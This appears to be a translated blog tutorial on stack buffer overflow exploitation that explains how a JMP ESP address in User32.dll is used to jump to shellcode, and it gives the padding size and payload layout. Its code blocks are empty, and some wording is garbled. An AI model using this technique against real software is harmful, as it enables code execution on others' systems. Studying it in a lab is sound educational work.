Click here to download this article with executable program, shellcode file
Source: Moeomu’s blog
Stack space shifting
ShellCode is often dynamic in memory and is not directly filled with a fixed value
That is, the stack space address of the buffer array in the previous article is not always a fixed value
When the CPU executes to this address, it may trigger an invalid instruction exception and crash the program and ShellCode will not run.
Principle
Find the address of a JMP ESP instruction from the loaded system DLL and use this address to flood the return address
This allows for precise location of the shellcode and adapts to the dynamic changes in the stack space
The stack address is small and large, the CPU execution order is from small address to large address, stack flooding is also from small address to large address
This allows ShellCode to be dynamically addressed by flooding the previous section with meaningless data and flooding the start of ShellCode at [ESP].
ShellCode writing
structure
Useless data + JMP ESP address (this address is exactly flooded to the function return address) + command code (for testing, MessageBox popup)
Description.
retnwill jump toJMP ESPafterwards, then ESP + 4JMP ESPwill jump to the command code exactly after
necessary data
JMP ESPaddress: located in User32.dll0x77D29353(no need to be the original command, just search the binary0xFFE4)- Garbage data size: 52 Byte = Buffer(44 Byte) + authenticated(4 Byte) + EBP(4 Byte)
Final Code
Here is the command code to be executed
|
|
Final ShellCode
|
|